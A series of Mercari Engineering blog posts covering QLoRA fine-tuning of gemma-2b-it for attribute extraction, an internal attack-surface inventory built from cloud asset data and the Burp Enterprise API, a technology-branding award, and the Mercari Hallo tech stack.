Mercari Engineering blog

Fine-Tuning an LLM to Extract Dynamically Specified Attributes

Fri, 13 Sep 2024 12:07:47 GMT

Hello, I am @andre, a machine learning engineer on the AI/LLM team at Mercari.

In a previous article, we discussed how our team utilized commercial LLM APIs to build an initial feature to support our customers and improve the platform’s selling experience.

This article will describe one of our past experiments in fine-tuning a 2-billion parameter large language model (LLM) using QLoRA, to extract dynamically specified attributes from user-generated content, and compared the performance with GPT-3.5 turbo—a much larger model. Results show that the fine-tuned model outperforms the bigger model in terms of extraction quality while being significantly smaller in size and less costly. We hope this article will provide valuable insights into what it takes to fine-tune an LLM effectively.

Background

In a Japanese customer-to-customer (C2C) marketplace, specific details could impact the quality of a listing description. However, understanding the precise details in a user-generated listing description can be tricky. This is due to several challenges, including:

Wide variety of user-generated content: Each seller describes their listings differently.
Category specificity: What’s essential varies from one category to another.
Time sensitivity: User-generated content continuously evolves.

By accurately extracting existing key attributes from listing descriptions, we can gain a deeper understanding of the contents written by our customers—specifically, in this case, the sellers. Figure 1 below illustrates an example of a listing description and the extracted values. For the purpose of this article, the illustration shows an example of a listing written in English; however, most listings within Mercari are written in Japanese. Such insight can also help us guide our customers to enhance their listings, making them more appealing and effective.

Figure 1. Illustration of the extracted attributes from a sample listing description

Why not just use light-weight, conventional, non-LLM models?

Dynamic and varied attributes: The way attributes are described can change frequently, leading to high maintenance requirements and the need for continuous model re-training. Having a model that could handle dynamically specified attributes could go a long way.
Generalization capability: Large language models (LLMs) have the potential to generalize far better than conventional ML models with much less training data, even for handling out-of-distribution data.
Multi-linguality: Most listings in Mercari are written in Japanese, however, with the huge variety of goods being exchanged, there are also listings written in other languages, such as English and Chinese. The multilingual capability of recent LLMs are expected to be able to handle such varieties better than conventional ML models.

On the other hand, why not just use existing commercial LLM APIs?

Cost of commercial APIs: Though commercial LLM APIs are becoming more affordable, at the time this article is written, the sheer number of requests in a production environment would still make them prohibitively expensive.
Control over hallucinations: It’s more difficult to manage and minimize hallucinations purely through prompt engineering with commercial APIs.

Given these considerations, we decided to experiment with fine-tuning our own model. For this experiment, we used a single A100 GPU with an 80 GB memory VM instance (a2-ultragpu-1g) from GCP to fine-tune a large language model using QLoRA. Our short-term goal was to see if we can build a model that could achieve similar or even better performance than GPT-3.5 Turbo despite being significantly smaller and cheaper to run in production.

Dataset and Base Model

To tackle our task, we first defined the input and output requirements for the model:

Input: A text description of the listing and a list of attribute keys to extract. For example:
- Listing description: A Mercari T-shirt size M, blue. Used only once and kept in a clean wardrobe after.
- Attribute keys: size, color, original retail price
Output: The extracted attributes and their values. For example:
- Size: M
- Color: Blue
- Original retail price: NONE

To build our dataset, we gathered historical descriptions along with their attributes. Since attribute keys can vary across item categories, we started by focusing on the 20 categories with the highest listings on our platform.

We structured the data into inputs and outputs and integrated these pairs with specific prompts, which were then used to fine-tune the LLMs. We experimented with various prompts written in English and Japanese; however, the prompt generally contains the following.

An initial prompt sentence, telling the model that it will receive an instruction below and instructing it to respond accordingly.
The instruction, mentioning that it will be given a description text in the context of an online marketplace listing, and instructing the model to extract a list of attribute keys from the input text. It also tells the model to respond following a specific format.
The input text, containing the listing description text from which we want to extract attributes.
The output text, containing the response text with the attribute keys and the extracted values.

Below is an example of the prompt templates we experimented with, written in Japanese:

以下に、あるタスクを説明する指示があり、それに付随する入力が更なる文脈を提供しています。
リクエストを適切に完了するための回答を記述してください。

### 指示:
次の文章はオンラインマーケットプレイスに投稿されているリスティングの情報です。
その文章から{attr_names}の情報を探し出してください。
妥当な情報が存在したら「{attr_name}: <内容>」で応答してください。逆に存在しない場合はかならず「{attr_name}: NONE」で応答してください。

### 入力（文章）:
{input}

### 応答:
{output}

Once the dataset was ready, our next step was identifying potential LLMs for fine-tuning. The Nejumi Leaderboard for Japanese LMs, curated by the Weights and Biases Japan team, was one of our primary resources. It comprehensively evaluates various large language models’ capabilities in handling Japanese text. After testing and experimenting with several models, we decided to move forward with the gemma-2b-it model provided by the team at Google (paper, HF).

Parameter efficient fine-tuning with QLoRA

To embark on our fine-tuning journey, we used QLoRA—a cutting-edge approach known for its efficient fine-tuning. As cited from the original paper, QLoRA significantly reduces memory usage, allowing one to fine-tune a 65B parameter model on a single 48GB GPU while preserving the full 16-bit fine-tuning task performance. The image below illustrates how QLoRA compares to full fine-tuning and LoRA methods.

Figure 2. Illustration of how fine-tuning with QLoRA works under the hood (adapted from the original figure on QLoRA: Efficient Finetuning of Quantized LLMs)

Now, let’s dive into the fine-tuning process!

Initially, we load the pre-processed dataset previously stored as W&B artifacts into memory.

...
with wandb.init(entity=ENTITY_NAME, project=PROJECT_NAME, job_type=JOB_TYPE_NAME, tags=["hf_sft"]):
    artifact = wandb.use_artifact(ENTITY_NAME+'/'+PROJECT_NAME+'/train_test_split:latest', type='dataset')
    artifact_dir = artifact.download()

loaded_dataset = load_dataset("json", data_dir=artifact_dir)
train_data = loaded_dataset["train"]
eval_data  = loaded_dataset["test"]
...

Then, we define the LoRA configurations (hyperparameters) and target modules. One example of the modules and configurations that we experimented with is as follows:

...
target_modules = ['q_proj','k_proj','v_proj','o_proj','gate_proj','down_proj','up_proj','lm_head']

lora_config = LoraConfig(
    r=16,
    lora_alpha=16,
    lora_dropout=0.05,
    bias="none",
    target_modules = target_modules,
    task_type="CAUSAL_LM",
)
...

And then, the fine-tuning hyperparameters and quantization configurations. Following is an example of the configurations that we experimented with:

...
training_args = TrainingArguments(
    output_dir=base_dir,
    report_to="wandb",
    save_strategy="epoch",
    evaluation_strategy="epoch",
    num_train_epochs = 1,
    per_device_train_batch_size=4,
    gradient_accumulation_steps=4,
    optim='adamw_torch',
    learning_rate=2e-4,
    fp16=True,
    max_grad_norm=0.3,
    warmup_ratio=0.1,
    group_by_length=True,
    lr_scheduler_type="linear",
)

nf4_config = BitsAndBytesConfig(
  load_in_4bit=True,
  bnb_4bit_quant_type="nf4",
  bnb_4bit_use_double_quant=True,
  bnb_4bit_compute_dtype=torch.bfloat16
)
...

Once the above are set up, we then load the base model and tokenizer from HuggingFace:

...
model_path = "google/gemma-2b-it"
tokenizer = AutoTokenizer.from_pretrained(model_path, add_eos_token=True)
model = AutoModelForCausalLM.from_pretrained(
    model_path, device_map='auto', quantization_config=nf4_config,
)
...

We then use the SFTTrainer from HuggingFace to begin fine-tuning:

...
trainer = SFTTrainer(
    model,
    train_dataset=dataset["train"],
    eval_dataset=dataset["test"],
    packing=True,
    max_seq_length=1024,
    args=training_args,
    formatting_func=create_prompt,
)
# Upcast layer norms to float 32 for stability
for name, module in trainer.model.named_modules():
  if "norm" in name:
    module = module.to(torch.float32)

run = wandb.init(entity=ENTITY_NAME, project=PROJECT_NAME, job_type="start_finetuning", config=config)
st = time.time()
trainer.train()
elapsed = time.time() - st
run.log({"elapsed_time (seconds)": elapsed})
run.finish()
...

Finally, we merge and save the fine-tuned model:

...
new_model = NEW_MODEL_PATH_AND_NAME
trainer.model.save_pretrained(new_model)
trainer.tokenizer.save_pretrained(new_model)

base_model = AutoModelForCausalLM.from_pretrained(
    model_path,
    torch_dtype=torch.float16,
)
merged_model= PeftModel.from_pretrained(base_model, new_model)
merged_model= merged_model.merge_and_unload()

merged_model.save_pretrained(new_model+"-merged",safe_serialization=True)
tokenizer.save_pretrained(new_model+"-merged")
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"
...

Post-training Quantization and Model Evaluation

Post-training quantization aims to see if we can further shrink the model size while maintaining satisfactory performance. We used the llama.cpp library—an open-source tool that enables post-training model quantization and faster inference using LLMs in C/C++.

Here’s an overview of the steps we followed using llama.cpp for model conversion and quantization. Note that some steps might be outdated by the time of publication, so we recommend referring to the llama.cpp repository for the latest information:

Clone the Repository: Clone the llama.cpp GitHub repository and run the build commands using the appropriate settings. Detailed instructions can be found here.
- Note: Since support for Gemma models was added around the end of February 2024, ensure you use the correct version of llama.cpp.
Convert the Model: Convert the fine-tuned model, previously stored in the HuggingFace format, to a format compatible with llama.cpp.
Select Quantization Method: Choose the quantization method and start the quantization process. The 4-bit precision method (q4_k_m) worked well for our use case.
Convert and Quantize: the resulting model is stored in the GGUF format.

After the post-training quantization finishes, we evaluated the model in GGUF format and compared its performance. As of our experiment, GPT-4o (including the mini model) was not available. Therefore, considering its cost and latency advantages, we chose GPT-3.5 turbo (specifically, gpt-3.5-turbo-0125) as our baseline model for performance comparison.

Some key metrics for the evaluation:

BLEU Score: This score provided insights into the quality of extracted attribute values compared to the actual values.
Model Size and Latency: We also checked the resulting model size and latency to assess cost-efficiency and readiness for production use.

Here are some key findings from our quick experiment:

The final 4-bit precision GGUF model (q4_k_m) is a QLoRA fine-tuned version of the gemma-2b-it model.
The model is approximately 95% smaller than the gemma-2b-it base model downloaded from HuggingFace.
The model achieved a BLEU score slightly more than five percentage points higher than gpt-3.5-turbo-0125.
Additionally, an initial rough estimate at the time of the experiment showed that using the fine-tuned model could reduce the cost by more than 14 times compared to using gpt-3.5-turbo-0125. However, given the rapidly changing pricing structures of commercial models, this figure should be taken with a grain of salt.

In summary, the final model is significantly smaller—approximately 95%—than the original base model from HuggingFace and achieves a BLEU score higher than gpt-3.5-turbo-0125.

Conclusion

This experiment demonstrates the practicality of fine-tuning our LLM for attribute value extraction from user-generated content as an effective alternative to commercial LLM APIs. By utilizing QLoRA, we managed to fine-tune the gemma-2b-it model efficiently, reducing its size by around 95% compared to the original base model. Despite this significant size reduction, our fine-tuned model still outperformed gpt-3.5-turbo-0125 by achieving a higher BLEU score, thus validating the efficacy of our approach in both performance and resource optimization.

Besides the improvements in performance and cost savings, our hands-on approach provided better control over the model’s behavior, helping to mitigate issues like hallucinations more effectively than prompt engineering alone. We hope this article offers valuable insights and practical guidance for those looking to fine-tune their models and transition away from expensive and less controllable commercial APIs. By leveraging advancements in large language models and innovative techniques like QLoRA, there are significant opportunities for future development and optimization.

Mapping the Attack Surface from the Inside

Mon, 22 Jul 2024 11:08:15 GMT

Abstract

If a company wants to protect its attack surface, it first needs to know it, yet in many companies, there is no clear picture of what services are exposed to the internet. We have been working on a system to create a map of the company’s attack surface. There are many explanations of this process from the perspective of the attacker, but it turned out to be a very different process from the inside.

At Mercari, we currently allow a lot of flexibility to developers on what they deploy and how they deploy it, which means there is a large variety of places we have to check if we want to create a complete inventory. We attempted to create a system that requires minimal maintenance and contribution from individual developers while still granting good oversight of our infrastructure, weak points, and services we can deprecate. In the process, we gained a better understanding of our infrastructure and learned about the pitfalls of relying on IaC. We have also learned to embrace flexibility in designing a system that is mapping the unknown. When you plan to handle things you are just now discovering exist, your first plan will likely not be correct.

Security Philosophy

Before making a plan, I think explaining the security philosophy informing our design decisions is useful. We tend to prefer solutions that put the least burden on developers since the more efficient their work is, the more they can deliver on the product side. At the same time, we have to make solutions that scale to the size of a fairly large company.

Kelly Shortridge wrote a blog post back in 2020 about the problems of over-doing and under-doing security that was very impactful for me. The problem with creating an overly strict security environment is that it suffocates the organization. Developers are bogged down by waiting on security reviews and prevented from using the latest and greatest technology.

The Managerial Security Mindset

Creating a rigid system is a really easy mistake for a security professional. If the job is to make everything secure, one can hardly be blamed for wanting control over everything. It is a managerial mindset in which the security team tries to guide secure development through restrictions, reviews, and fixed rules of what can and cannot be done in the company. The problem with this attitude is not only that no company has enough security engineers to manage absolutely everything but also its complete antagonism towards innovation.

Companies need to create things to make a profit, and if they want to stay ahead of the competition, they need to use the latest technology to create those things. In the managerial security mindset, everything outside of the mold is scary, full of unknown risks that will definitely destroy the company. In reality, developers experimenting with new solutions and project managers experimenting with new features are the things that propel the company forward. While most new technologies and ideas might not be great, if experimenting itself is made to be a burden, the company will stagnate, calcify, and will eventually go bankrupt by more innovative corporations delivering a better product faster, even if not quite as securely.

The Importance of Developer Attitude

It is also worth keeping in mind that if security processes become annoying and tiresome, their efficiency falls off a cliff. Most developers are interested in security and will willingly contribute to improving it, provided they aren’t hampered by excessive procedural hurdles. On the other hand, once the amount of security procedures becomes a hindrance, it will create an adversarial relationship between the security team and developers.

With these considerations in mind, our approach focuses on empowering developers by providing them with intuitive tools and clear security information. Instead of constraining their technological choices, we expand our visibility to understand and secure these technologies collaboratively.

Finding the Sweet Spot

Naturally, the reality is somewhere in the middle. Sometimes, restrictions are necessary, and some security burden has to be placed on the developers. I think an ideal security posture is not just halfway between complete rigidity and complete chaos. The sweet spot is constantly moving depending on market trends, technical innovations, and ultimately, what the business is trying to achieve.

Initial Plan

The original PoC for this project aimed at detecting new domains added to one of our sub-companies so they could be added to Burp Enterprise for periodic scanning. To achieve this, we simply have to parse the IaC repositories that contain the domains, and present the new ones to the team every week. Once a team member makes a decision, we can use the Burp Enterprise API to schedule scanning for the domain.

Implementing the Burp Enterprise API

At the time of creation, there was not much documentation on how to use PortSwigger’s Burp Enterprise API. There is a REST and a GraphQL API with different capabilities. The REST API is lacking a lot of features we need, since it is just a slightly changed version of the Burp Professional API. The GraphQL api provides most of the functionality we need, but there is no way to pin the API version and it is still under development, so we are risking features breaking on every update. Still, it is either the GraphQL API, or Selenium, so GraphQL it is. With a GraphQL API, we are expected to hand-craft the specific requests we want to use. Given the vague documentation, this seemed fairly time consuming.

Looking for an easier option, we’ve stumbled upon genqlient from Khan Academy. For the correctly formatted GraphQL schema, genqlient can create a go library accessing all the queries and mutations of that schema. It is not perfect, but after a bit of tweaking, it works fairly well. PortSwigger does not publish its schema, but the default installation allows GraphQL Introspection. During penetration testing, an attacker might use this to better understand the capabilities of the API. In this case we used it for the same reason, but we intend to legitimately use the API.

To create a complete introspection query, we used gqlfetch because it immediately formats the results into a standard format that can easily be converted to SDL. After you have the resulting SDL file, you can generate individual query and mutation files with gqlg

gqlg --schemaFilePath schema.graphql --destDirPath ./gqlg --ext graphql

The resulting ./gqlg folder will have a list of queries and mutations, from which you can select the ones you want to use. We simply copied the useful ones into the ./used_query_schemas/ folder and capitalized their name to make the corresponding Golang functions exported. Some of the files might be partially incorrect, for those cases you’ll have to rename some things or address errors as they arise.

go run github.com/Khan/genqlient

This will generate the Go library. If you tweaked the gqlg files correctly, this library should compile and export functions to interact with the API. You’ll also have to implement an authentication RoundTrip to add the “Authorization” header with the Burp API key.

After getting over that hurdle we tried using this solution for the first time.

We used a Slack bot to create a simple, interactive Slack message where knowledgeable team members could decide whether a domain should be scanned.

Initial Learnings

When we started to use this slack bot, a few things became clear. There are a lot of websites and a lot of new subdomains registered every week, making a decision on them still requires manual labor. It is often not obvious what a domain is used for, their names range from legible words to 12 character random strings. The sites hosted range from test sites to pages that simply respond with 404. Most of the websites are hosted by us, but some of them are handled by third parties that we should not scan. Most importantly, there are a lot more websites owned by the company than what we parsed so far. They can be found in a variety of different IaC repositories responsible for different departments, or CDN configurations. Some domains are simply defined directly in the cloud without any IaC and some services do not have a domain at all.

The tragedy of IaC

I mentioned that the approach of parsing IaC did not quite work out. This was not because we were unable to parse the fairly large number and variety of IaC repositories that all define different services. It was ultimately because IaC is simply inaccurate.

https://en.wikipedia.org/wiki/Allegory_of_the_cave#/media/File:An_Illustration_of_The_Allegory_of_the_Cave,_from_Plato%E2%80%99s_Republic.jpg

We spend a lot of time writing IaC code to define all kinds of resources, but half the time it does not work and sometimes it cannot work. For example, there are some features in GCP that the terraform provider simply does not support, or if it does, it is documented so badly that people will sooner give up and set it from the gcloud cli or on the web console. Every time that happens, a discrepancy between IaC and reality is created.

That is all to say, IaC is more of an approximation of the infrastructure, and less of a concrete definition. Of course, we do our best to ensure accurate IaC for critical infrastructure, but the things we are most interested in are anything but. We want to see accidentally published services in test environments, long forgotten infrastructure created before the widespread adaptation of IaC and the like.

Going to the Source

To solve the issues of IaC, we decided to switch to directly querying the asset inventory of the various cloud providers. Luckily, GCP, AWS and hopefully Azure (although we haven’t gotten that far yet) have their own inventory of what assets they are housing. This includes not only hosted zones and Route53 configurations, but also things like IP addresses, or ephemeral services such as GCP’s Cloud Run.

These are especially interesting, since they form part of the attack surface without requiring a domain or a dedicated IP address. In GCP there is both an “Asset Inventory” and a “Security Asset Inventory”, in which the security one seems to be easier to query. In AWS, you can use an AWS Config fed by an Aggregator to create a similar inventory. With this approach, we have a more complete picture that is also more accurate. Even if a developer bypasses IaC to create a domain or resource, we will be able to see it. In some cases we also get the user who created the resource, giving us a good idea on who to contact if we find an issue.

Visualization

After we set this collection system up, it quickly became clear that some visualization would make the data more useful. Questions like “which sites are reachable from the internet”, “Are these sites all protected by Identity-Aware Proxy (IAP)?” arose during development, which we could answer at a glance once we made screenshots of every site. We were also able to spot anomalies, like unexpected services being hosted, and domains that pointed to IP addresses that were now in use by other tenants in the cloud.

To do this, we have set up a Google Cloud Run (GCR) service that accepts a list of domains, and spins up chromium to take screenshots of them. Utilizing the automatic scanning of GCR, we batched the domains in a daily GCR job and spun up a few dozen instances to take all the screenshots in about 10 minutes.

We were also able to create connections between domains and IP addresses. This meant that we no longer had to manually review every domain before scanning. If we know that a domain points at an IP owned by our cloud tenant, we can simply add it to Burp Suite and wait for the results to roll in.

Conclusion

When starting the project it was only meant to be a way to automate the mundane process of adding domains to Burp Enterprise. The initial PoC got us closer to that goal, although it still proved to be too burdensome to use. To fix that, we had to add some functionality and change some existing features. We then had to move away from relying on IaC and pivot to using cloud inventories. Then we decided to be more ambitious and change the system into a complete attack surface inventory.

During this project we have learned a lot about our infrastructure. Knowledge about the attack surface is held in as many parts as the people who have created it. Consolidating that information into one place gives us a great ability to detect weak points and anomalies. Perhaps the weakest points of our attack surface were the ones that we knew the least about. Sites created years ago now lay abandoned, as their creators moved on to new projects. The older a system is, the less likely it is to be using recent solutions, like IaC or even the Cloud, and the more likely it is to not be maintained. Long forgotten, and with little detectable evidence of their existence, these systems still churn away, waiting to serve users and attackers alike. The things we need to see the most are the best hidden.

With every iteration we not only added new features, but also changed and undone some things we already spent time working on. This may seem like a waste of time, but in practice, almost every process works this way. When the process is started, the way to get to the final goal is often not known. We start on a path, and periodically reassess to see if we are getting closer. As we get closer to our goal, we might realize we were slightly off-course and need to correct, or we might even realize that our goal was not as useful as a different goal we are also approaching. We should be ready to adapt during the project to deliver the best thing we can, even if it is different from our initial goal. When I feel stuck on a project, I find it helpful to simply start doing anything, and oftentimes that work will produce information that helps me find a good direction for the next step.

Mercari Ranked #1 in Technology Branding Ranking for three years in a row!

Tue, 16 Jul 2024 18:21:21 GMT

Hello, this is yasu_shiwaku from the Engineering Office.

On July 16th 2024, Mercari was awarded first place in "Technology Branding” at the Developer eXperience AWARD 2024 conducted by the Japan CTO Association, for the third consecutive year. The press release annoucement by the Japan CTO Association is available here.

The Award ceremony was held in-person in Tokyo following the previous year’s event. Shunya Kimura, CTO Marketplace of Mercari, attended the event to receive the plaquette (Kimura is presenting as a panelist on July 17th’s panel discussion at the same event)

We are pleased to receive high evaluations from many people in the Tech industry in Japan for three years in a row. This is thanks to our engineers who contribute to the technical output on a daily basis, in a wide variety of ways such as blogs, presentations and attending events, both internally and externally.

Mercari Group is fostering a culture in which engineers proactively communicate and give back their experience and knowledge to the technology community, to aid in empowering the industry as well as helping it grow.

We also contribute to the open source community by supporting conferences, project sponsoring and other various supporting activities (see here for Mercari’s standpoint on open source. The softwares open to the public is here)

Under the mission to “Circulate all forms of value to unleash the potential in all people,” the members of Mercari Group will proactively continue to disseminate information to contribute to the development community, in order to circulate the values which our Engineering Organization can provide.

List of Engineering contents platform

Mercari Engineering Website (this portal site)
X account (English, Japanese)
Events related
- Connpass
- Meetup
YouTube Channels
- Mercari Gears
- Mercari devjp

If you are interested in what kind of developer experience and culture you can have at Mercari Group, please take a look at our career site!
Software Engineer/Engineering Manager

Mercari Hallo’s Tech Stack and Why We Chose It

Tue, 02 Jul 2024 13:54:12 GMT

Hello! I’m @napoli, a software engineer (Engineering Head) for Mercari Hallo. This is the third article in the Mercari Hallo, World! series, which is a behind-the-scenes look at Mercari Hallo’s development.

In early March 2024, we launched a new service called Mercari Hallo. Mercari Hallo is an on-demand work service enabling users to work in their free time for as little as one hour.

In this article, I’ll explain the tech stack and architecture we used when creating Mercari Hallo, as well as the reasons for our decisions.

What you’ll learn in this article

The big picture of Mercari Hallo’s tech stack and architecture
How and why we chose this tech stack
Tips for how to choose a tech stack when starting a new service

Main tech stack

The main tech stack used for Mercari Hallo is as follows:

Backend
- Go
- Google Cloud Platform (GKE, Cloud SQL for PostgreSQL, etc.)
- GraphQL
- gqlgen
- ent.
Frontend
- React / TypeScript
- Next.js
- Apollo Client (React)
Mobile app (the standalone Mercari Hallo app)
- Flutter / Dart

We use modular monolithic architecture for the backend and the monorepo repository management method.

Modular monolithic architecture

Around April 2023, Mercari Group decided to enter the on-demand labor business and formed a new team to do so. Initially, the plan was just to build a proof of concept (PoC) to see if Mercari could bring unique value to this domain, and then grow the service if it seemed promising. This meant that the team was expected to rapidly build the service with only a small number of people. (In the early days, the team only had one or two engineers!)

Given the situation, we decided to take the modular monolithic approach for the backend (server). The Mercari marketplace app, Mercari Group’s main service, evolved from a monolithic architecture to a microservice architecture as it grew. Modular monolithic architecture is somewhere between these two approaches—to put it simply, it integrates microservices into a monolithic system. Looking back on it now, I think this was the right choice.

Easy connections between services

In modular monolithic architecture, one server contains all functions expected of an API server. All functions run in the same program, but the functions are actually independent modules within the server. The modules connect to provide functionality as an API. (We call these modules “services” in Mercari Hallo.)

When I say “one” server, I mean one server program (or one deployment unit). Because all services are implemented in one server, there’s no need for remote procedure calls (RPCs). Unlike microservice architecture, which may use multiple RPCs to provide one API, functionality is completed by calling functions within the same program. This means we don’t need to worry about defining protocols for communication between services or handling network errors, which makes the implementation work and design significantly easier.

Transactions with a single database

In addition to the backend being a modular monolith, Mercari Hallo uses a single instance for its main database. This structure enables the database’s transaction functionality to be utilized to its full capabilities. Mercari Hallo has many cases where the integrity of data is extremely important, such as information regarding wages. Database transaction functionality is extremely powerful in this regard; data inconsistency between services, which was a major point of concern in microservice architecture, is not much of a problem. This also made implementation work and design much easier.

Small amount of infrastructure-related code

Mercari Hallo uses the IaaS service Terraform. Modular monoliths generally run on a single server, so the amount of infrastructure-related code needed is smaller than when using microservices. Engineers who specialize in application domains, such as APIs, often find that configuring and testing the infrastructure takes longer than they expect. Not needing much code for infrastructure and instead enabling engineers to focus on implementing the API was a great help for Mercari Hallo’s quick development.

Points to keep in mind

While modular monolithic architecture was a good choice for Mercari Hallo, there are some things to keep in mind.

One large concern is that the initial design tends to be difficult. If you aren’t careful with how you design the system, it can easily turn into just a regular monolith. Monoliths aren’t inherently bad, of course, but not separating the modules or services within the system appropriately according to their scope of responsibility can lead to large problems. If the system isn’t appropriately separated into modules, it can be difficult to reuse functionality, and modifying one thing somewhere can have unintended effects elsewhere. A system with complex interdependencies is both hard to understand and hard to test, increasing the likelihood of system failures. As a result, rapid functionality development becomes more and more difficult as time goes on.

One advantage of microservice architecture is that you’re basically forced to separate modules/services on the infrastructure level. In addition to the size of programs being different, databases are generally independent for each microservice, so changes to one service don’t have a direct impact on other services. This does depend on the granularity you choose to use for microservices, but developers are essentially required to think about the appropriate size and scope of modules/services. And because each service is independent, the scope of responsibility tends to be clear. Microservice architecture also works well for large organizations; it’s easy to assign ownership of each microservice to individual teams.

For better or for worse, the modular monolith doesn’t force you to separate modules/services—but it’s just as important to get this right as it is in microservice architecture. Whoever is in charge of the initial architecture design needs to design the modular monolith very carefully, and the developers all need to understand it well as they implement functionality. This is a fairly difficult task.

That said, I think the modular monolith approach is good for quickly developing a new product, like Mercari Hallo. If you know from the beginning that it will become a large-scale product, a distributed system like microservice architecture is also an effective choice, but in most cases, it’s okay to wait to physically separate the system until after the scale of the product has grown from a business perspective.

As a side note, this isn’t the first time a Mercari product has used modular monolithic architecture. In that instance, unlike Mercari Hallo, the developers migrated the system from a monolith to a modular monolith. You can read about it here:
Making a Modular Monolith out of Mercari’s Transaction Domain (Available only in Japanese)

Monorepo

Mercari Hallo uses a monorepo. This means that we manage all components that make up the system, such as the backend and frontend, in a single repository, while maintaining independence for each component.

In this section, I’ll list some of the reasons that I think this approach was the best choice for us.

Ability to see the whole system in one place

Using a monorepo means that all of the necessary system components are stored in one repository. This makes it very easy to see the whole system at a glance. When Mercari Hallo was first getting started, we didn’t have many engineers, so there were times when a single engineer would be working on the backend, frontend, and mobile app all at once. Having all the code in one place is a big advantage in terms of ease of development. If you’re working on the backend or mobile app and want to see how something is implemented in the frontend, you can simply search the files from your IDE or editor to find the answer right away. You don’t need to go through the hassle of switching to a different repository, running git pull, switching to a different window, and so on. Of course, code written for other areas in different programming languages may still be hard to understand, but it’s at least easy to search for the code across the entire system.

Ease of code reviews

All pull requests are on the same GitHub repository, so it’s easy to review them even across domains. For implementations that involve specialized knowledge, it’s better to have someone with that knowledge review the code, but in many cases, members in other domains can review simple modifications to the code well enough. Mercari Hallo requires pull requests to be approved before they can be merged into the main branch, so the speed of reviews is crucial. The less time it takes to merge a pull request into the main branch, the less likely it is that a merge conflict will occur. This means that the time spent on resolving conflicts goes down, QA is easier, and we can focus on more important tasks. This is also doable with a multi-repo setup, of course, but a monorepo is definitely easier.

Sharing GraphQL schema files

Mercari Hallo uses GraphQL (which I’ll go into detail about later on) for communication between the backend and the frontend/mobile app. By sharing the GraphQL schemas that are created on the backend within the same repository, we were able to automatically generate the GraphQL client code for the frontend and connect the two easily. Even beyond GraphQL schema files, not needing to go out and fetch necessary files remotely is just convenient overall, and helps stabilize the development environment.

Sense of unity from working in the same place

This isn’t really technical, but bear with me for a minute: Using a monorepo makes it feel like we’re all working together to develop the product, even though we’re in different domains, like frontend and backend. Similar to what I said above about being able to see the whole system in one place, you can see how frequently and how devotedly people in other domains carry out their work. This is surprisingly important for development projects that require close communication. It’s not something you can quantify, but I think it had a good impact on Mercari Hallo’s development team.

The structure of our monorepo

The main languages we use for Mercari Hallo are Go, Dart, and TypeScript. We have directories for each language directly under the root of the repository. This makes it easier to manage the ecosystem and CI/CD. In day-to-day development work, this also has the benefit of enabling engineers to work in basically independent environments even within the same repository. For example, someone working on the backend can generally stay within the Go directory.

Independent build environments

In Mercari Hallo’s monorepo, each component (backend, frontend, etc.) has their own independent build technique. There are tools like Bazel out there for centralized build management, but we don’t use them. When Mercari Hallo was just getting started, we were fortunate to have highly skilled developers in each domain, so we used the standard build techniques they were most familiar with. This enabled us to seamlessly set up build environments, since the developers didn’t have to learn new technology. We haven’t run into any particular problems with this on the operations side, either. Not to say that there aren’t any benefits to using centralized build management techniques across components, but they also come with their own difficulties. Unless you have a clear reason for wanting to use centralized techniques, I’d recommend setting up independent build environments for each component.

—

So, those are some examples of the benefits of a monorepo and how we use it for Mercari Hallo. It’s often said that the monorepo approach has the disadvantage of the repository getting too big, but given the network and local environments commonly used these days, I don’t think you have to worry about that unless the service gets really large-scale. There are some other minor drawbacks, but I think the benefits outweigh them significantly. I recommend the monorepo approach when starting up a new service.

Infrastructure at a glance

Mercari Hallo uses Google Cloud Platform for infrastructure as much as possible. This is basically what it looks like:

The backend runs on a GraphQL server using Google Kubernetes Engine (GKE). Gateway, which precedes the API, and Next.js also run on GKE. We use Cloud SQL for PostgreSQL for the database, Redis for memory storage, Fastly for the CDN, and Cloudflare as an image optimization (conversion) service.

Google Kubernetes Engine (GKE)

Mercari Hallo uses Google Kubernetes Engine (GKE) for backend infrastructure. We chose GKE for two main reasons:

Use and expertise within Mercari Group

Many Mercari Group services run on GKE. We have a Platform Team in charge of operation and maintenance. GKE (Kubernetes) is generally difficult to understand for engineers who aren’t specialized in infrastructure, but Mercari Group has plenty of tools, documentation, and best practices for efficient configuration and development. The Platform Team also provides thorough support. Thanks to this, we ran into relatively few problems.

Integration with the Mercari ecosystem

Many of Mercari Group’s services use GKE and communicate between services on the same cluster using gRPC. This enables us to securely and efficiently use existing services. Mercari Hallo needed to use a few of Mercari’s existing microservices, so being able to use these services easily and securely was a big advantage.

Other options

We chose GKE for Mercari Hallo because there was support for it within Mercari Group and because it was important to be able to integrate with the existing Mercari ecosystem. That said, the construction and operation is somewhat difficult, so if you’re creating a standalone service from scratch and you don’t have anyone with the right expertise, I think an easy-to-use serverless environment like Cloud Run is a viable option as well.

Backend / Go

We use Go for backend development. Go is the standard backend language in Mercari Group and stands far above other languages in terms of expertise and resource allocation within the company. It’s also well suited to API development; execution speed is fast, and goroutines enable powerful parallel processing.

Go is also a simple and easy-to-read language—so simple that two people coding the same thing will generally write the same code. This is a huge plus when you have a large amount of people working on the code; it significantly lowers the difficulty of understanding what’s going on and doing code reviews. I also find it easier to notice problems in the code in Go over other languages.

When code is complex, it can be difficult to decipher what the code is doing and why, even if you’re the one who wrote it in the first place. In that sense, Go may very well be a language that’s even easier for the reader than it is for the writer. Being easy for the reader is a large advantage when operating a service in the long term, because as the years pass, the time spent reading the code becomes longer than the time spent writing the code.

I also personally really like Go, so I think at the moment it would be my top choice for API development, even outside of Mercari.

Cloud SQL for PostgreSQL / Ent / Atlas

We use Cloud SQL for PostgreSQL for our database. Many Mercari Group services use Google Cloud Spanner, but we chose to use Cloud SQL for PostgreSQL for the following reasons:

Low learning cost

PostgreSQL is an RDBMS, which many engineers have knowledge of and experience in, so there isn’t much they have to learn to get started. A low learning curve means that it’s easy for new members to jump into development and hit the ground running.

Rich ecosystem

PostgreSQL has been around for a long time, and there are plenty of third-party tools and libraries built for it. Having tools and libraries at your disposal leads to efficient development, and is no small advantage. There are also high-functioning GUI tools, which is very useful for directly adjusting data while debugging.

Portability

PostgreSQL is provided as a Docker image, and can be easily run locally on Docker. This makes it easy to run unit tests involving the database, and also to set up a local environment similar to the remote development server.

The nature of Mercari Hallo’s service

Given the nature of the Mercari Hallo service, we read the database much more than we write to it. As a result, we decided that a single instance would be able to handle all write commands, at least for the foreseeable future. For reading the database, we believe that creating read replicas as necessary will be enough to handle most traffic we get.

—

